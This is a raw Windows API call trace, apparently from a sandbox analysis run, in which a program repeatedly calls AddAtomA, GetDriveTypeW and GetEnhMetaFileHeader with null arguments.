[0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) 
returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) 
returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.531] AddAtomA (lpString=0x0) returned 0x0 [0093.531] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.531] AddAtomA (lpString=0x0) returned 0x0 [0093.531] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.531] AddAtomA (lpString=0x0) returned 0x0 [0093.531] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.531] AddAtomA (lpString=0x0) returned 0x0 [0093.531] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.531] AddAtomA (lpString=0x0) returned 0x0 [0093.531] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.531] AddAtomA (lpString=0x0) returned 0x0 [0093.531] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.531] AddAtomA (lpString=0x0) returned 0x0 [0093.531] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.546] AddAtomA (lpString=0x0) returned 0x0 [0093.546] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.546] AddAtomA (lpString=0x0) returned 0x0 [0093.546] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.546] AddAtomA (lpString=0x0) returned 0x0 [0093.546] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.549] AddAtomA (lpString=0x0) returned 0x0 [0093.549] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.549] AddAtomA (lpString=0x0) returned 0x0 [0093.549] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.549] AddAtomA (lpString=0x0) returned 0x0 [0093.549] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.549] AddAtomA (lpString=0x0) returned 0x0 [0093.549] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.549] AddAtomA (lpString=0x0) 
returned 0x0 [0093.549] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 